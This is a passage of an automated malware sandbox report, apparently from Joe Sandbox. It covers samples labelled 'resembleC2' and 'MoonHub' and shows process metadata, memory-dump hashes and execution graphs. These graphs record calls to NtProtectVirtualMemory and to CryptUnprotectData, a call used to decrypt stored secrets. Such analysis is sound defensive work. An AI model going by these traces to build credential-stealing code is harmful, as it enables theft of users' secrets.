                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:34
                                                                                                                                                                              Start time:01:11:30
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:ping localhost
                                                                                                                                                                              Imagebase:0x7ff6cde40000
                                                                                                                                                                              File size:22'528 bytes
                                                                                                                                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2184643349.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff848e90000_resembleC2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8fdd8f084cf084b3fad4530c0ccd70ac5e80c4214a4647182f4a20c4301a7250
                                                                                                                                                                                • Instruction ID: 56ecfeeb4ee4c1e312a3a377100a7fd0540b97eb390077c846bce15d3eb9ac54
                                                                                                                                                                                • Opcode Fuzzy Hash: 8fdd8f084cf084b3fad4530c0ccd70ac5e80c4214a4647182f4a20c4301a7250
                                                                                                                                                                                • Instruction Fuzzy Hash: E101C412F1DCD90FE7A8B2BC28596B467C1FB9A695F4801F6D04DC3297DD6F58024345
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2184643349.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff848e90000_resembleC2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4bafee83d6a2019b7b3e9044fc1a8ba9544bccfed8746f91db798592d5dc1dae
                                                                                                                                                                                • Instruction ID: 11c13c650268c827e73e91d9bfb486560aff60b2b3b5a60d8517b52a115beafc
                                                                                                                                                                                • Opcode Fuzzy Hash: 4bafee83d6a2019b7b3e9044fc1a8ba9544bccfed8746f91db798592d5dc1dae
                                                                                                                                                                                • Instruction Fuzzy Hash: 02017B12F1DC890FF7A8B1BC24596B867C1FB8A6A5F4402B5D00DC32C6DD7E58424341
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2184643349.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff848e90000_resembleC2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cdedf66bb228f65c19cca40f9a429cc675b711531e6cb4eb0e17e67998143629
                                                                                                                                                                                • Instruction ID: b717701cddd89711fac294974bc2f84dc05181e91f9fc81b082ae2f6dcffe758
                                                                                                                                                                                • Opcode Fuzzy Hash: cdedf66bb228f65c19cca40f9a429cc675b711531e6cb4eb0e17e67998143629
                                                                                                                                                                                • Instruction Fuzzy Hash: 4DF02B21A0CB514FF794B73C485A4797FD0FF95694F8805BBE448CB1A7EA28E9808385

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:16.9%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:100%
                                                                                                                                                                                Total number of Nodes:3
                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                execution_graph 4870 7ff848e59c2e 4871 7ff848e59c5f NtProtectVirtualMemory 4870->4871 4873 7ff848e59d35 4871->4873

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.3380141619.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff848e50000_6z2guuz0ldkdgc1o.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                • Opcode ID: 7a6f96d693dea59f751fae66a657e267d3a07080c1d28c46ba2dbf0bc84d4a63
                                                                                                                                                                                • Instruction ID: 52a5077b1524b5d475ad245666f750bd93c082ed83bea9f73546b714e557885d
                                                                                                                                                                                • Opcode Fuzzy Hash: 7a6f96d693dea59f751fae66a657e267d3a07080c1d28c46ba2dbf0bc84d4a63
                                                                                                                                                                                • Instruction Fuzzy Hash: 9341F87190CB884FDB599B68A8157E97FF1EB9A320F0442AFE089D3253CA745809C7D2

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:14.3%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:100%
                                                                                                                                                                                Total number of Nodes:4
                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                execution_graph 43510 7ff8490536fe 43511 7ff84905371a 43510->43511 43512 7ff849053817 CryptUnprotectData 43511->43512 43513 7ff849053893 43512->43513

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 8`=j$8`=j$@`=j$@`=j$@`=j$H`=j$H`=j
                                                                                                                                                                                • API String ID: 0-3727776267
                                                                                                                                                                                • Opcode ID: 806e55b190deb5bafc1100b814a05cf7cc1c9c7b659b3171735a6e40dc2719c6
                                                                                                                                                                                • Instruction ID: 9582d86c8ca3fd41f40ff46831cd04e2c5ecc8ea9b5890f5efe9804eb21ae557
                                                                                                                                                                                • Opcode Fuzzy Hash: 806e55b190deb5bafc1100b814a05cf7cc1c9c7b659b3171735a6e40dc2719c6
                                                                                                                                                                                • Instruction Fuzzy Hash: 01F1D231A0DA4A9FD798EF2884556BA77E2FF99754F0441BDE00AC7292DF389842CB44
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: x6=j
                                                                                                                                                                                • API String ID: 0-1755713205
                                                                                                                                                                                • Opcode ID: 4d53d5b41377f762fb9e6b5051e8588405a3a220eee3fb5239e68175d1699897
                                                                                                                                                                                • Instruction ID: d585ee0ef888049b3ec826668b545ace956b1f1685944d97f9f624be1acda78f
                                                                                                                                                                                • Opcode Fuzzy Hash: 4d53d5b41377f762fb9e6b5051e8588405a3a220eee3fb5239e68175d1699897
                                                                                                                                                                                • Instruction Fuzzy Hash: DD42D131E1CA475FE798BA2C94562B973D2FF94750F54417DE04EC72C2DF38A80A8A89
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2999957175.00007FF849050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849050000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff849050000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 834300711-0
                                                                                                                                                                                • Opcode ID: c1da01dbf5dedb34834bf80fdb8419bef6471f773e4b692f0176087fd05ddf76
                                                                                                                                                                                • Instruction ID: 6a674dae3c060306c6322547a496a5548ed79ca48d43f2e622dbb9802ef0dcda
                                                                                                                                                                                • Opcode Fuzzy Hash: c1da01dbf5dedb34834bf80fdb8419bef6471f773e4b692f0176087fd05ddf76
                                                                                                                                                                                • Instruction Fuzzy Hash: DC510B71A1CA8C9FDB58EB2C98056B9BBE0FF59711F04427EE44DC3293DE24A8458792
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 23b0cff9d485ffff91cf18bd99adabf02982063cb775455ce1bb9b9e3f1b916c
                                                                                                                                                                                • Instruction ID: 527dc28535195b2903a15ae972084be91e0944eb47bfee96e5fab5498159da29
                                                                                                                                                                                • Opcode Fuzzy Hash: 23b0cff9d485ffff91cf18bd99adabf02982063cb775455ce1bb9b9e3f1b916c
                                                                                                                                                                                • Instruction Fuzzy Hash: D2426D30A1CE4A8FDA98EA18D081AB6B3E1FFA5340F14457DD44EC3686DF39F8468795
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 708e1e84e5d27ad015c8b8f9a589fa19acc3fbb3b27f577c986cfc9ab0fcf863
                                                                                                                                                                                • Instruction ID: 6e3afa1f895a70a8f948b4994dcfefb58c147e08281ed191abdaec294d7a0ddc
                                                                                                                                                                                • Opcode Fuzzy Hash: 708e1e84e5d27ad015c8b8f9a589fa19acc3fbb3b27f577c986cfc9ab0fcf863
                                                                                                                                                                                • Instruction Fuzzy Hash: 00425C30A1CA4A8FEB98EB18C494BB5B3E1FF58340F1041B9D44EC7692DF39A885CB55
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b922415630dc8b70cb959ceacc69aeaca1cd0651fbb9f900f3f0bcb3dc292cbe
                                                                                                                                                                                • Instruction ID: 8e5a51d534494d128f02777478d97b55eeb88e680ff858bffc0de202fde82630
                                                                                                                                                                                • Opcode Fuzzy Hash: b922415630dc8b70cb959ceacc69aeaca1cd0651fbb9f900f3f0bcb3dc292cbe
                                                                                                                                                                                • Instruction Fuzzy Hash: 5812E331A0DA0A9FD788EF2C98556BA77E1FF99750F1441BED04AC7292DF389C428B44
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f69335887c37af3fcef454ab188f4af5c19d278adee3ea2b958205b316e56065
                                                                                                                                                                                • Instruction ID: d8daff6f5f28dae1d948e7cb47a5be1c875881e722e7d742f3261a84c4c5a178
                                                                                                                                                                                • Opcode Fuzzy Hash: f69335887c37af3fcef454ab188f4af5c19d278adee3ea2b958205b316e56065
                                                                                                                                                                                • Instruction Fuzzy Hash: 16A10031A0DB469FE78CEA2C98156B577D2FF96750B0441BED04AC72E2EF389C028B45

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: [=j$ [=j$ [=j$ [=j$ [=j$ [=j$ [=j$@[=j$H[=j$P[=j$X[=j$`[=j$h[=j$p[=j
                                                                                                                                                                                • API String ID: 0-567507759
                                                                                                                                                                                • Opcode ID: 69b030a29903e7283870e2c1d1142ca91345135ca51b8c99edd351f9b2e0a608
                                                                                                                                                                                • Instruction ID: f793cbfe0345c48d97aecbc8abc9fd21750fbaa7bb963502568a3e9956e6ce42
                                                                                                                                                                                • Opcode Fuzzy Hash: 69b030a29903e7283870e2c1d1142ca91345135ca51b8c99edd351f9b2e0a608
                                                                                                                                                                                • Instruction Fuzzy Hash: 25D11661D0EAC65FE78AFA7858156E97BE1FF06264F0804FAD08ACB0D3EA6C5C458351

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: [=j$ [=j$ [=j$ [=j$ [=j$ [=j$ [=j$[=jV$j
                                                                                                                                                                                • API String ID: 0-994020929
                                                                                                                                                                                • Opcode ID: b21c7052639e953ebee2e0f082d74af4157a0b84678b532814723f8bbbd23753
                                                                                                                                                                                • Instruction ID: f6eb13fb98109025ba81e2ef624675785d0481a1cdb36ef3b85a324bb9abb074
                                                                                                                                                                                • Opcode Fuzzy Hash: b21c7052639e953ebee2e0f082d74af4157a0b84678b532814723f8bbbd23753
                                                                                                                                                                                • Instruction Fuzzy Hash: D1F14661C0EAC69FE796BB7848156EA7BE0FF06354F0804FDD0898B1A7EE6C5C058315

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Z=j$Z=j$Z=j$Z=j$Z=j$Z=j$Z=j$Z=j$Z=j
                                                                                                                                                                                • API String ID: 0-2630587675
                                                                                                                                                                                • Opcode ID: 98c8224275db32841cd3af9882ccd1f2e26753c36a4ff9ec31825650ca0e1c2d
                                                                                                                                                                                • Instruction ID: da997706a73ffaf82727477d8ec4a983ceff72510fdbe89e63e76fbad1b6e0e2
                                                                                                                                                                                • Opcode Fuzzy Hash: 98c8224275db32841cd3af9882ccd1f2e26753c36a4ff9ec31825650ca0e1c2d
                                                                                                                                                                                • Instruction Fuzzy Hash: B991FB3190D7969FE343E7748899AA67BE0FF02750F4805FAC45ACB0A3EA2C2846C755

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: [=j$ [=j$ [=j$ [=j$ \=j$H$H
                                                                                                                                                                                • API String ID: 0-2237833136
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: [=j$ [=j$ [=j$([=j$0[=j$8[=j
                                                                                                                                                                                • API String ID: 0-1191698884
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: [=j$ [=j$ [=j$[=j
                                                                                                                                                                                • API String ID: 0-2958635295
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: [=j$ [=j$ [=j$[=j
                                                                                                                                                                                • API String ID: 0-2958635295
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: P`=j$X`=j$``=j
                                                                                                                                                                                • API String ID: 0-2140007580
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: H0H$_=j$_=j
                                                                                                                                                                                • API String ID: 0-3519045170
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: [=j$p[=j$x[=j
                                                                                                                                                                                • API String ID: 0-693049284
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: aK_H
                                                                                                                                                                                • API String ID: 0-2603984226
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: x6=j$x6=j
                                                                                                                                                                                • API String ID: 0-4087914330
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: OG_H
                                                                                                                                                                                • API String ID: 0-3535963147
                                                                                                                                                                                • Opcode ID: 9a5af04249a5b412dc2f6b7b0a066f8b2a5bc3917f20cf8c8a13a4013a304649
                                                                                                                                                                                • Instruction ID: 67a14b02141df653f316e816b70f1306a074b7306a68b9a3589ccaab16f37a25
                                                                                                                                                                                • Opcode Fuzzy Hash: 9a5af04249a5b412dc2f6b7b0a066f8b2a5bc3917f20cf8c8a13a4013a304649
                                                                                                                                                                                • Instruction Fuzzy Hash: A1E15F30A0C94B8FDA98EA18D494AB573E2FF99354F5441B9C00DCB296DF39EC86CB45
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 6=j
                                                                                                                                                                                • API String ID: 0-3426113708
                                                                                                                                                                                • Opcode ID: 26c7cbeb7b42c2cb6297bf7d8cf86f2d09664b38b405973141cc5fe1636a18a1
                                                                                                                                                                                • Instruction ID: d621668896e9fda5a4efc8b7c6971614b92657256302764a2b517eb272425cb5
                                                                                                                                                                                • Opcode Fuzzy Hash: 26c7cbeb7b42c2cb6297bf7d8cf86f2d09664b38b405973141cc5fe1636a18a1
                                                                                                                                                                                • Instruction Fuzzy Hash: 6EC12731A0C68A8FEB94EB6888552F97BE1FF5A358F0401BAD44DC72D2DF785806C741
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: _
                                                                                                                                                                                • API String ID: 0-701932520
                                                                                                                                                                                • Opcode ID: e70d79114df5cf4a3e243becb1a46e716e70e0a1cdd736ce679bb3bba0b0ae24
                                                                                                                                                                                • Instruction ID: 01111087befbdb4577c761b949d539715eba0b60cdb8efea5926849ae4813ce8
                                                                                                                                                                                • Opcode Fuzzy Hash: e70d79114df5cf4a3e243becb1a46e716e70e0a1cdd736ce679bb3bba0b0ae24
                                                                                                                                                                                • Instruction Fuzzy Hash: 55A14071A2CE458FDB98FF18D0819A573E1FFA8740B1441ADE00AC76A6DF35F8468B85
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: `=j
                                                                                                                                                                                • API String ID: 0-2751924910
                                                                                                                                                                                • Opcode ID: 9e3f125d3ce872cafde3c641ef33e59b9112ff015e8bf94071bd0453323ca40f
                                                                                                                                                                                • Instruction ID: 945036f81a9899f07d9cc05dfbbbfb00ab798ee6735bb3bcb4d863a8b1cd08a4
                                                                                                                                                                                • Opcode Fuzzy Hash: 9e3f125d3ce872cafde3c641ef33e59b9112ff015e8bf94071bd0453323ca40f
                                                                                                                                                                                • Instruction Fuzzy Hash: A991053184E7C99FE752A7744C255E57FE0EF47760F0901FAD488CB0A3DA2C990A8756
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0@H
                                                                                                                                                                                • API String ID: 0-2218331987
                                                                                                                                                                                • Opcode ID: 7241adfe0423acfec4e48f23ca0d238c3f4b42da28767513e71a726785214d73
                                                                                                                                                                                • Instruction ID: 11bb450d371bbf8dff16972968fa4f9865b9dabfafd32fcab15b2060f9a25ff8
                                                                                                                                                                                • Opcode Fuzzy Hash: 7241adfe0423acfec4e48f23ca0d238c3f4b42da28767513e71a726785214d73
                                                                                                                                                                                • Instruction Fuzzy Hash: 99914831A28A1D9FDB94EF6CD888EA977E1FF68350F0401A5E41ED7265DB34E841CB40
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Pc=j
                                                                                                                                                                                • API String ID: 0-1733780799
                                                                                                                                                                                • Opcode ID: 2fead45f5483ea88087f7832496a76e83a646f88283d62e5b0b85af037eea89c
                                                                                                                                                                                • Instruction ID: e402ce7671d0a6fe7f58e6ce75311463cd977d18d6e5b0a00d8c0a20bc79b288
                                                                                                                                                                                • Opcode Fuzzy Hash: 2fead45f5483ea88087f7832496a76e83a646f88283d62e5b0b85af037eea89c
                                                                                                                                                                                • Instruction Fuzzy Hash: D2812431E1CE094FDB98EB6C98456B9B7E1FF98391F04427AD01ED3296DF74A8428780
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: `=j
                                                                                                                                                                                • API String ID: 0-237927418
